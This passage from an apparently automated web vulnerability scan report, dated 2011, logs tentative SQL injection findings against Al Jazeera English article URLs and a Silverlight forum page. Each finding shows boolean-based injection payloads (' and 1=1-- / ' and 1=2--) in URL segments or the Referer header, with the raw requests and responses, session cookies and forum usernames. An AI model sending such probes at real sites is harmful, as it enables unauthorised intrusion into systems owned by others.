<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news'%20and%201%3d2--%20/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:51:59 GMT
Date: Sun, 30 Jan 2011 14:51:59 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 16
X-Cache: HIT from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>



<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.10. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast'%20and%201%3d1--%20/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:53:23 GMT
Expires: Sun, 30 Jan 2011 14:53:23 GMT
Date: Sun, 30 Jan 2011 14:53:23 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4mzuhv45dkuuyh45qjoteg55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:53:09 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast'%20and%201%3d2--%20/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:53:14 GMT
Date: Sun, 30 Jan 2011 14:53:14 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 9
X-Cache: HIT from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>



<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.11. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast/2011'%20and%201%3d1--%20/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:54:23 GMT
Expires: Sun, 30 Jan 2011 14:54:23 GMT
Date: Sun, 30 Jan 2011 14:58:06 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zm2lsi45ohofqt55b5zofc25; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:58:01 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast/2011'%20and%201%3d2--%20/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:54:13 GMT
Date: Sun, 30 Jan 2011 14:57:56 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 11
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>



<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.12. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/middleeast/2011/01'%20and%201%3d1--%20/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:55:14 GMT
Expires: Sun, 30 Jan 2011 14:55:14 GMT
Date: Sun, 30 Jan 2011 14:58:57 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xpdobtjno12jtunglmaon455; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:58:50 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
</head>
<body class="MainBG" >
<form name="aspnetForm" method="post" action="Templates/FreeTemplate.aspx?Rq=6)O7AGuNR-5Hs3tQp8_-6aO0dG3Wd-4Z(w(lW3v-7G(ayK(!5-5YNMMejO2-7p0%3dPmm()-4DDj
...[SNIP]...

Request 2

GET /news/middleeast/2011/01'%20and%201%3d2--%20/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:55:13 GMT
Date: Sun, 30 Jan 2011 14:58:56 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=60
Content-Length: 174785
Content-Type: text/html
Age: 2
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   AJE - Al Jazeera English
</title><link id="ctl00_lnkRss" rel="alternate" type="application/rss+xml" title="Aljazeer English" href="/Services/Rss/?PostingId=2007731105943979989" /><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:44:41 GMT" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />
<link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js?i=1" type="text/javascript"></script>
<script src="/Scripts/jquery-1.2.3.pack.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/StoryFader.js" type="text/javascript"></script>
<script type="text/javascript" src="/AJEPlayer/swfobject.js"></script>
<script type="text/javascript">//isItMobile();</script>
</head>
<body class="MainBG">
<form id='Default' name='Default' method='post'>



<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwLwz6SaDgLlsYGEDAKx8M2kDQ==" />
<div id="dvSummaryExt">
<div id="dvSummaryMain">
<div id="dvBanners">
<div id="dvMainAd"></div>
<div id="dvAdSpacer"></div>
<div id="dvSmallAd"></div>
</div>
<div id="dvPageHeaderRow">

...[SNIP]...

1.13. http://forums.silverlight.net/forums/topicsactive.aspx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://forums.silverlight.net
Path:   /forums/topicsactive.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73344
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:39:49 GMT; expires=Mon, 30-Jan-2012 15:39:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 15:59:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:39:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<a href="/members/abeaulieu.aspx" title="abeaulieu" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="abeaulieu" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/abeaulieu.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/clintong.aspx" title="clintong" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="clintong" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/clintong.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/j2inet.aspx" title="j2inet" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="j2inet" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/j2inet.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/swo.aspx" title="swo" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="swo" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/swo.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>

...[SNIP]...

Request 2

GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73401
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:39:50 GMT; expires=Mon, 30-Jan-2012 15:39:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 15:59:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:39:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
<a href="/members/Gaz3ll.aspx" title="Gaz3ll" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="Gaz3ll" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/Gaz3ll.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/j2inet.aspx" title="j2inet" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="j2inet" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/j2inet.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/queequac.aspx" title="queequac" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="queequac" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/queequac.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/atti.aspx" title="atti" class="online">
<img src="http://i1.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319805000000000&cdn_id=12152010" alt="atti" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/atti.jpg?forceidenticon=False&dt=634319805000000000&cdn_id=12152010');" />
</a>
</li>

<li>

...[SNIP]...

1.14. http://forums.silverlight.net/user/viewonline.aspx [ASP.NET_SessionId cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.silverlight.net
